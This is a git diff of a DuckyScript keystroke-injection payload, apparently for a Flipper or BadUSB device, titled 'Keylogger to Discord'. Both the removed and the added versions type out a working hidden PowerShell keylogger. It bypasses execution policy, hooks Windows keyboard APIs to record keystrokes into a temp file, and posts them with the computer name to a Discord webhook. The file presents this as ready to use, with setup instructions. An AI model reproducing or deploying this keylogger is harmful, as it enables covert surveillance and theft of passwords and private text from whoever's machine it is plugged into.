diff --git a/OSINT/Keylogger to Discord.txt b/OSINT/Keylogger to Discord.txt index a33a1e9..c10d7f1 100644 --- a/OSINT/Keylogger to Discord.txt +++ b/OSINT/Keylogger to Discord.txt @@ -2,481 +2,21 @@ REM Title: Keylogger to Discord REM Author: @beigeworm REM Description: Uses Powershell to gather keystroke info and send it via Discord. REM Target: Windows 10 +REM LEARN MORE HERE - https://github.com/beigeworm/Powershell-Tools-and-Toys REM *SETUP* -REM replace WEBHOOK_HERE with your discord webhook. -REM set $runtime=1 to desired interval beetween emails (in minutes). Default is 1 minute. +REM replace WEBHOOK_GOES_HERE with your discord webhook. + REM some setup for dukie script DEFAULT_DELAY 100 -REM Open Notepad for script building. -DELAY 1000 -GUI r -DELAY 500 -STRING notepad -ENTER -DELAY 2500 -STRING Do{$whuri = "WEBHOOK_HERE";$RunTime = 1;$TimesRun = 1;$getT = Get-Date -ENTER -STRING $end = $strt.addminutes($RunTime);function Start-Key($Path="$env:temp\log.txt"){$sigs = @' -ENTER -STRING [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] public static extern short GetAsyncKeyState(int virtualKeyCode); -ENTER -STRING [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int GetKeyboardState(byte[] keystate); -ENTER -STRING [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int MapVirtualKey(uint uCode, int uMapType); -ENTER -STRING [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); -ENTER -STRING '@ -ENTER -ENTER -STRING $API = Add-Type -MemberDefinition $sigs -Name 'Win32' -Namespace API -PassThru;$null = New-Item -Path $Path -ItemType File -Force;try{$rnnr = 0;while ($TimesRun -ge $rnnr){ -ENTER -STRING while ($end -ge $getT){Start-Sleep -Milliseconds 30;for($ascii = 9; $ascii -le 254; $ascii++){$state = $API::GetAsyncKeyState($ascii);if($state -eq -32767){$null = [console]::CapsLock -ENTER -STRING $virtualKey = $API::MapVirtualKey($ascii, 3);$kbstate = New-Object Byte[] 256;$checkkbstate = $API::GetKeyboardState($kbstate);$mychar = New-Object -TypeName System.Text.StringBuilder -ENTER -STRING $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0);if($success){[System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)}}} -ENTER -STRING $getT = Get-Date};$msg = Get-Content -Path $Path -Raw; $escmsg = $msg -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} -ENTER -STRING $json = @{"username" = "$env:COMPUTERNAME" -ENTER -STRING "content" = $escmsg} | ConvertTo-Json -ENTER -STRING Start-Sleep 1; Invoke-RestMethod -Uri $whuri -Method Post -ContentType "application/json" -Body $json; Start-Sleep 1; $whuri = "." -ENTER -STRING Remove-Item -Path $Path -force}}finally{}}Start-Key}While ($a -le 5) -ENTER -DELAY 1000 - -REM because typing speed can't be adjusted. (Can be avoided by moving the mouse while flipper types) -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE -ESCAPE - - -DELAY 10000 -REM save in temp directory. -DELAY 1000 -CTRL-SHIFT s -DELAY 1500 -STRING %temp% -ENTER -STRING txtlog.ps1 -DELAY 500 -TAB -DOWN -DOWN -ENTER -ENTER -DELAY 1000 -ALT F4 - REM Open Powershell and start logs. DELAY 1000 GUI r DELAY 500 -STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:temp;sleep 1; ./txtlog.ps1;sleep 5;exit +STRING powershell -NoP -NonI -Exec Bypass -W hidden +ENTER +DELAY 5000 +STRING $dc = "WEBHOOK_GOES_HERE!";$API = '[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] public static extern short GetAsyncKeyState(int virtualKeyCode); [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int GetKeyboardState(byte[] keystate); [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int MapVirtualKey(uint uCode, int uMapType); [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);';$lpth = "$env:temp/t.txt";$API = Add-Type -MemberDefinition $API -Name 'Win32' -Namespace API -PassThru;$no = New-Item -Path $lpth -ItemType File -Force;$fcont = Get-Content -Path $lpth -Raw;$lkt = [System.Diagnostics.Stopwatch]::StartNew();$kth = [TimeSpan]::FromSeconds(10);While ($true){$kpr = $false;try{while ($lkt.Elapsed -lt $kth){Start-Sleep -Milliseconds 30;for ($asc = 9; $asc -le 254; $asc++){$keyst = $API::GetAsyncKeyState($asc);if ($keyst -eq -32767) {$kpr = $true;$lkt.Restart();$null = [console]::CapsLock;$vtkey = $API::MapVirtualKey($asc, 3);$kbst = New-Object Byte[] 256;$checkkbst = $API::GetKeyboardState($kbst);$logchar = New-Object -TypeName System.Text.StringBuilder;if ($API::ToUnicode($asc, $vtkey, $kbst, $logchar, $logchar.Capacity, 0)){[System.IO.File]::AppendAllText($lpth, $logchar, [System.Text.Encoding]::Unicode) }}}}}finally{If ($kpr) {$fcont = Get-Content -Path $lpth -Raw;$escmsgsys = $fcont -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')};$jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsgsys} | ConvertTo-Json;Invoke-RestMethod -Uri $dc -Method Post -ContentType "application/json" -Body $jsonsys;Remove-Item -Path $lpth -Force;$kpr = $false}}$lkt.Restart();Start-Sleep -Milliseconds 10} ENTER -